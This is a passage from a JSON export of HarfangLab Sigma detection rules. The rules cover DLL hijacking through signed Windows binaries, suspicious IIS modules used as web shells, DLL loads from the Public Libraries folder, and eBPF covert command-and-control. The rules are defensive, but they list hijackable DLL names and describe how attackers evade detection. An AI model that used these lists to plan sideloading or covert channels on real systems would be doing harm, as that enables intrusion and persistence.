attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'workfolders.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a",
"rule_name": "DLL Hijacking via workfolders.exe",
"rule_description": "Detects potential Windows DLL Hijacking via workfolders.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075904Z",
"creation_date": "2026-03-23T11:45:34.075906Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075910Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference",
"https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/",
"https://attack.mitre.org/techniques/T1505/004/"
],
"name": "t1505_004_iis_module_native_load_pre43.yml",
"content": "title: Suspicious IIS Module Loaded\nid: 0ae4376f-360f-4b97-9b3f-4c735a82fbf6\ndescription: |\n Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\n Malicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\n It is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n This rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/20\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessDescription: 'IIS Worker Process'\n ImageLoaded|re:\n - '(?i)^[A-Z]:\\\\Windows\\\\System32\\\\inetsrv\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n AgentVersion|lt|version: 4.3 # Before this version, only native DLL are considered, see 29dfc6e6-c42a-4009-8e21-367675f7e417\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - 
'?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - '?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - 
'?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 
'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_legitimate_nicelimited:\n - Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'NICE Systems Ltd'\n - Company: 'NICE Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately require the loading of an unsigned library server-wide.\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6",
"rule_name": "Suspicious IIS Module Loaded",
"rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\nThis rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1505.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0aede467-048c-4d8e-887a-5d4afe2b47d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586945Z",
"creation_date": "2026-03-23T11:45:34.586949Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586966Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netsh.yml",
"content": "title: DLL Hijacking via netsh.exe\nid: 0aede467-048c-4d8e-887a-5d4afe2b47d8\ndescription: |\n Detects potential Windows DLL Hijacking via netsh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netsh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\AUTHFWCFG.DLL'\n - '\\Cabinet.dll'\n - '\\CRYPTBASE.DLL'\n - '\\DHCPCMONITOR.DLL'\n - '\\dhcpcsvc6.DLL'\n - '\\dhcpcsvc.DLL'\n - '\\DNSAPI.dll'\n - '\\dot3api.dll'\n - '\\DOT3CFG.DLL'\n - '\\eappcfg.dll'\n - '\\eappprxy.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\FWCFG.DLL'\n - '\\FWPolicyIOMgr.dll'\n - '\\fwpuclnt.dll'\n - '\\HNETMON.DLL'\n - '\\HTTPAPI.dll'\n - '\\IFMON.DLL'\n - '\\IPHLPAPI.DLL'\n - '\\ktmw32.dll'\n - '\\mintdh.dll'\n - '\\MobileNetworking.dll'\n - '\\NDFAPI.DLL'\n - '\\NETIOHLP.DLL'\n - '\\netshell.dll'\n - '\\NETTRACE.DLL'\n - '\\nlaapi.dll'\n - '\\NSHHTTP.DLL'\n - '\\NSHIPSEC.DLL'\n 
- '\\NSHWFP.DLL'\n - '\\OneX.DLL'\n - '\\P2P.dll'\n - '\\P2PNETSH.DLL'\n - '\\PEERDISTSH.DLL'\n - '\\POLSTORE.DLL'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\RASMONTR.DLL'\n - '\\RMCLIENT.dll'\n - '\\RPCNSH.DLL'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\wcmapi.dll'\n - '\\WCNNETSH.DLL'\n - '\\wdi.dll'\n - '\\wevtapi.dll'\n - '\\WHHELPER.DLL'\n - '\\WINHTTP.dll'\n - '\\WINIPSEC.DLL'\n - '\\WINNSI.DLL'\n - '\\wlanapi.dll'\n - '\\WLANCFG.DLL'\n - '\\WSHELPER.DLL'\n - '\\WWANCFG.DLL'\n - '\\wwapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0aede467-048c-4d8e-887a-5d4afe2b47d8",
"rule_name": "DLL Hijacking via netsh.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netsh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079690Z",
"creation_date": "2026-03-23T11:45:34.079692Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079697Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/mustang-panda-targets-europe/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_user_public_libraries.yml",
"content": "title: DLL Loaded from Libraries Folder\nid: 0b84fa6b-6d3b-4041-972c-ee8b193fa745\ndescription: |\n Detects the suspicious loading of a DLL from the libraries folder of the Public user.\n This folder is an uncommon directory for a DLL to load from and is often abused by attackers.\n It is recommended to analyze the loaded DLL to look for malicious behavior or content.\nreferences:\n - https://blog.talosintelligence.com/mustang-panda-targets-europe/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/03/06\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\Users\\Public\\Libraries\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745",
"rule_name": "DLL Loaded from Libraries Folder",
"rule_description": "Detects the suspicious loading of a DLL from the libraries folder of the Public user.\nThis folder is an uncommon directory for a DLL to load from and is often abused by attackers.\nIt is recommended to analyze the loaded DLL to look for malicious behavior or content.\n",
"rule_creation_date": "2024-03-06",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0b99a008-58ed-40da-bc7d-43120837aaaf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620148Z",
"creation_date": "2026-03-23T11:45:34.620150Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf",
"https://redcanary.com/blog/threat-detection/ebpf-malware/",
"https://github.com/h3xduck/TripleCross",
"https://attack.mitre.org/techniques/T1205/002/"
],
"name": "t1205_002_possible_ebpf_covert_c2.yml",
"content": "title: Possible Extended BPF Covert C2\nid: 0b99a008-58ed-40da-bc7d-43120837aaaf\ndescription: |\n Detects the loading of a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program.\n Malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\n When a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\n A TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\n Together, these components create a covert communication channel without generating visible network activity.\n It is recommended to check the process that loaded the eBPF program for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://redcanary.com/blog/threat-detection/ebpf-malware/\n - https://github.com/h3xduck/TripleCross\n - https://attack.mitre.org/techniques/T1205/002/\ndate: 2025/11/13\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.002\n - attack.t1205.001\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_load'\n ProgramTypeStr:\n - 'BPF_PROG_TYPE_XDP'\n - 'BPF_PROG_TYPE_SCHED_CLS'\n Image: '*'\n\n filter_containers:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim'\n - '|/usr/libexec/crio/conmon'\n - '|/usr/bin/containerd'\n - '|/usr/bin/lxc-start'\n\n filter_edr:\n Image:\n - '/opt/hurukai-agent/bin/hurukai'\n - '/opt/CrowdStrike/falcon-sensor-bpf*'\n\n filter_cilium:\n Image: '/usr/bin/cilium-agent'\n\n filter_network_tools:\n Image:\n - '*/*bin/kxdpgun'\n - '*/bin/netbird'\n - 
'*/*bin/xdp-dns'\n - '*/bin/tc'\n\n filter_bpf_tools:\n Image: '*/bin/bpftool'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0b99a008-58ed-40da-bc7d-43120837aaaf",
"rule_name": "Possible Extended BPF Covert C2",
"rule_description": "Detects the loading of a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program.\nMalware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\nWhen a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\nA TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\nTogether, these components create a covert communication channel without generating visible network activity.\nIt is recommended to check the process that loaded the eBPF program for suspicious activities.\n",
"rule_creation_date": "2025-11-13",
"rule_modified_date": "2026-01-22",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1205.001",
"attack.t1205.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600433Z",
"creation_date": "2026-03-23T11:45:34.600436Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600444Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_proquota.yml",
"content": "title: DLL Hijacking via proquota.exe\nid: 0b9f13f2-fe2b-43fe-9f82-22ab533221ff\ndescription: |\n Detects potential Windows DLL Hijacking via proquota.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'proquota.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff",
"rule_name": "DLL Hijacking via proquota.exe",
"rule_description": "Detects potential Windows DLL Hijacking via proquota.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0baf276d-d629-4eb2-948c-1b0f87b13160",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590863Z",
"creation_date": "2026-03-23T11:45:34.590867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
